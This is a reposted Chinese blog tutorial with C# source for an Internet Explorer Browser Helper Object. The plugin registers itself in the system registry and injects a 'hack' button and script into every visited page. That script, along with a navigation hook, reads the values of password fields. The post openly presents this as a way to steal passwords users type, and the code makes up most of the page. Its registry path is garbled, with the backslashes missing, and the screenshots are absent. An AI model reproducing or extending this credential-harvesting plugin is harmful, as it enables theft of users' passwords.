摘自:http://tech.ddvip.com/2013-05/1369758775196257.html

BHO(Browser Helper Object)是插件,它寄存在IE浏览器中运行。在咱们的日常生活中无时无刻都在使用BHO,比如:迅雷检测用户是否单击了下载链接的BHO。用BHO也能做出些非常有意思的程序:窃取用户在网页上输入的密码信息等。

接下来,咱们也来制作一个恶搞的BHO吧,该BHO的功能如下:

1.注册成功后,每当用户浏览一个新的网页时,会自动在该网页中注入一个按钮

2.点击该按钮能获取用户在该网页中输入的敏感信息

操作步骤

图1

图2

图3

图4

图5

图6

图7

程序代码

IObjectWithSite.cs

using System;

using System.Collections.Generic;  

using System.Text;  

using System.Runtime.InteropServices;  

namespace HelloBHO

{  

    [

ComVisible(true),

InterfaceType(ComInterfaceType.InterfaceIsIUnknown),

Guid("FC4801A3-2BA9-11CF-A229-00AA003D7352")

]  

    public interface IObjectWithSite

    {

        [PreserveSig]

        int SetSite([MarshalAs(UnmanagedType.IUnknown)]object site);

        [PreserveSig]

        int GetSite(ref Guid guid, out IntPtr ppvSite);

    }

}

BHO.cs

using System;

using System.Collections.Generic;

using System.Text;  

using System.Runtime.InteropServices;

using SHDocVw;

using mshtml;

using Microsoft.Win32;  

namespace HelloBHO

{  

        [

    ComVisible(true),

    Guid("8a194578-81ea-4850-9911-13ba2d71efbd"),

    ClassInterface(ClassInterfaceType.None)

    ]

    public class BHO:IObjectWithSite

    {

        WebBrowser webBrowser;

        HTMLDocument document;  

        public void OnDocumentComplete(object pDisp,ref object URL)

        {

            document = (HTMLDocument)webBrowser.Document;

            IHTMLElement head = (IHTMLElement)((IHTMLElementCollection)document.all.tags("head")).item(null, 0);

            var body = (HTMLBody)document.body;  

            //添加Javascript脚本

            IHTMLScriptElement scriptElement = (IHTMLScriptElement)document.createElement("script");

            scriptElement.type = "text/javascript";

            scriptElement.text = "function FindPassword(){var tmp=document.getElementsByTagName('input');var pwdList='';for(var i=0;i<tmp.length;i++){if(tmp[i].type.toLowerCase()=='password'){pwdList+=tmp[i].value}} alert(pwdList);}";//document.getElementById('PWDHACK').value=pwdList;

            ((HTMLHeadElement)head).appendChild((IHTMLDOMNode)scriptElement);  

            //创建些可以使用CSS的节点

            string styleText = @".tb{position:absolute;top:100px;}";//left:100px;border:1px red solid;width:50px;height:50px;

            IHTMLStyleElement tmpStyle = (IHTMLStyleElement)document.createElement("style");  

            tmpStyle.type = "text/css";

            tmpStyle.styleSheet.cssText = styleText;  

            string btnString = @"<input type='button' value='hack' onclick='FindPassword()' />";

            body.insertAdjacentHTML("afterBegin", btnString);  

        }  

        public int SetSite(object site)

        {

            if (site != null)

            {

                webBrowser = (WebBrowser)site;  

                webBrowser.DocumentComplete += new DWebBrowserEvents2_DocumentCompleteEventHandler(this.OnDocumentComplete);

            }

            else

            {

                webBrowser.DocumentComplete -= new DWebBrowserEvents2_DocumentCompleteEventHandler(this.OnDocumentComplete);

                webBrowser = null;

            }

            return 0;

        }  

        public void OnBeforeNavigate2(object pDisp, ref object URL, ref object Flags, ref object TargetFrameName, ref object PostData, ref object Headers, ref bool Cancel)

        {

            document = (HTMLDocument)webBrowser.Document;

            foreach (IHTMLInputElement element in document.getElementsByTagName("INPUT"))

            {

                if (element.type.ToLower() == "password")

                {

                    System.Windows.Forms.MessageBox.Show(element.value);

                }

            }

        }  

        public int GetSite(ref Guid guid, out IntPtr ppvSite)

        {

            IntPtr punk = Marshal.GetIUnknownForObject(webBrowser);

            int hr = Marshal.QueryInterface(punk, ref guid, out ppvSite);

            Marshal.Release(punk);

            return hr;

        }  

        public static string BHOKEYNAME = "SoftwareMicrosoftWindowsCurrentVersionExplorerBrowser Helper Objects";  

        [ComRegisterFunction]

        public static void RegisterBHO(Type type)

        {

            RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(BHOKEYNAME, true);  

            if (registryKey == null)

                registryKey = Registry.LocalMachine.CreateSubKey(BHOKEYNAME);  

            string guid = type.GUID.ToString("B");

            RegistryKey ourKey = registryKey.OpenSubKey(guid);  

            if (ourKey == null)

                ourKey = registryKey.CreateSubKey(guid);  

            registryKey.Close();

            ourKey.Close();

        }  

        [ComUnregisterFunction]

        public static void UnregisterBHO(Type type)

        {

            RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(BHOKEYNAME, true);

            string guid = type.GUID.ToString("B");  

            if (registryKey != null)

                registryKey.DeleteSubKey(guid, false);

        }

    }

}

最新文章

  1. MFC2016.6.8
  2. cocos2d-x 常用UI
  3. Xn数列(codevs 1281)
  4. 第二百八十九天 how can I 坚持
  5. 基于注解的Spring MVC整合Hibernate(所需jar包,spring和Hibernate整合配置,springMVC配置,重定向,批量删除)
  6. 好用的侧边栏菜单/面板jQuery插件
  7. sqlserver数据库 提纲
  8. ThinkPHP - 登录流程
  9. windows和linux在建筑python集成开发环境IDE
  10. ORA-00119/ORA-00132
  11. [JCIP笔记](四)踩在巨人的肩上
  12. powerDesigner生成数据结构图以及对应sql导出方法
  13. HTTP请求行、请求头、请求体详解
  14. Qt中的CSS配置(QDarkStyleSheet)
  15. Android -- Drag&amp;&amp;Drop
  16. 品味性能之道&lt;七&gt;:索引基础
  17. 用于sql代码实现用户的创建,以及不同用户之间登陆的切换
  18. activiti获取流程图中的所有信息包括变量名
  19. hadoop(三)HDFS基础使用
  20. iOS项目之企业证书打包和发布

热门文章

  1. 161117、使用spring声明式事务抛出 identifier of an instance of
  2. Linux之awk命令详解
  3. win10 python nltk安装
  4. Dijkstra 算法、Kruskal 算法、Prim算法、floyd算法
  5. postgresql 热备与恢复
  6. 完整学习git三 查看暂存区目录树 git diff
  7. ACM题目————图的广度优先搜索
  8. c# 之抽象工厂模式
  9. javaWEB中的ServletRequest,ServletResponse的使用,及简化Servlet方法
  10. poj2482 Stars in Your Window